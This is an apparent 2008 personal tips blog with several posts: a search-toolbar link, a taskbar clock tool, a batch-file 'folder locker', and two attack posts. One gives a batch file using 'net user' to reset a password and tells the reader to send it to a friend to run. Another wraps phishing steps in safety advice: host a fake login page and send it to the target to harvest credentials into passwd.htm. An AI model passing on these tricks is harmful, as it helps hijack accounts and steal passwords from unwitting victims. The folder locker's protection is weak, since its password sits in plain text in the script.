Friday, October 24, 2008

create your search engine your self




create your search engine your self

http://www.pimpmysearch.com/home.html?gname=Mohammad

come this website goto change logo text type your name then you show a text Would you like...........................................

click yes

close it goto desktop refresh then open your browser enjoy

Thursday, October 16, 2008

Modify Windows start button to display System time




Download StartClock form the following url and run StartClockhttp://startclock.osnn.net/filesThis cool freeware will replace the word start with the system time. This tiny piece of code comes with startclock.ini file for making configuration changes such as 12 hour clock with seconds 24hour clock ,load program at start up, refresh rate (Be careful with this number smaller the number greater the cpu usage) and hide tray icon. To exit the program press “Ctr+Alt+x”. That’s it, now you can save precious space on the taskbar by replacing clock from the system tray.To remove clock from system tray right click on the task bar then choose properties and uncheck show clock.

Wednesday, October 15, 2008

Create Folder Lock Software Your Self From here no need to download any software




cls

@ECHO OFF

title Folder Locker

if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK

if NOT EXIST Locker goto MDLOCKER:CONFIRM

echo Are you sure u want to Lock the folder(Y/N)

set/p "cho=>"

if %cho%==Y goto LOCK

if %cho%==y goto LOCK

if %cho%==n goto END

if %cho%==N goto END

echo Invalid choice.

goto CONFIRM

:LOCK

ren Locker "Control

Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"attrib +h +s "Control

Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"echo Folder locked

goto End

:UNLOCK

echo Enter password to Unlock folder

set/p "pass=>"


if NOT %pass%==type your password here goto FAILattrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Lockerecho Folder Unlocked successfullygoto End:FAILecho Invalid passwordgoto end:MDLOCKERmd Lockerecho Locker created successfullygoto End:End

Friday, September 26, 2008

Changing password of a remote PC




Using the below given tips you can change the password of an user account in your friend’s system.
1. Open notepad.
2. Type the following command.
@echo off
net user username password
echo “type message here” pause
3. Save as filename.bat and select type of files as all files otherwise, file didn’t work.
4. Send file to your friend through any messenger.
You have successfully managed to change the Password of an user account.

Saturday, September 13, 2008

Protect yourself from fake login pages




Using fake login pages is the easiest way to hack passwords. Identifying a fake login page is very easy but many people neglect to do some small checks before entering the login details and fall in the trap. I have seen a person paying 500$ for a fake login page of paypal. This proves that there are still people falling in this trap. This is just an example, there are many fake websites of banks, yahoomail, gmail,orkut,myspace etc …This post is an attempt to show what a hacker does to hack your password using fake login pages and how to protect yourself from those fake logins.I will try to keep this post as simple as possible, there may be some technical details which you can safely skip.Warning: I strongly advice you not to try this on anyone it may spoil your relation with the person on whom you are trying it and you may even end up behind the bars.
What goes on behind when you enter your login details in login form??
When you enter your login details in any login form and hit enter they are submitted to another page which reads these login details and checks the database if you entered the correct username and passowrd, if yes then you will be taken to your account else you will get an error page.What an hacker does??
A hacker creates a fake page which looks exactly same as the original page and some how tricks you to enter your login details in that page. These login details are then submitted to a file.At this stage the hacker has two optionsHe can either store the login details on his server or he can directly get them mailed to his email id. All the above said things happen behind the scenes, you will have no clue of it. When you enter you login details for the first time your details are submitted to the hacker and you will be directed to a error page ( this is the original error page). When you enter ur login details again you will be logged in to your account. It’s quite common for us to enter the login details wrongly sometimes so you will not become suspicious when you get the error page.
How to identify fake login page traps ??
Never enter you login details in unknown sites.
Always type the address directly in to the browser.
Do not follows the links you get in mails and chatting even if they are from your friends
Always have a keen look in the address bar and verify if the address is correct. Check the screen shot below. Some people buy doamins which look simliar to the original site example: 0rkut for orkut, pay-pal for paypal,yahooo for yahoo. Some times you may over look these small differences and fall in trap.
Please do report to the hosting site or the original site owner when you find a fake login page.
If you feel like you entered your details in a fake login page change your password immediatley.
Now let’s go on with the trick..
You have to upload the fake login page on some server with php support. There are many free web hosting services available on the net, first sign up for anyone of them.Google for some free webhosting services,you will find many. Upload the files in the zipped folder on to your server and give the link of the fake login page to the person whose password you want to know. When the person enters his email id and password in to the fake login page they will be stored in a HTML file named “passwd.htm” on your server in the same directory where you uploaded the login page. Check that text file to get the passwords you wanted.
Here is the demo of the trick
Note:Don’t enter your actual password
Mohammad Fakira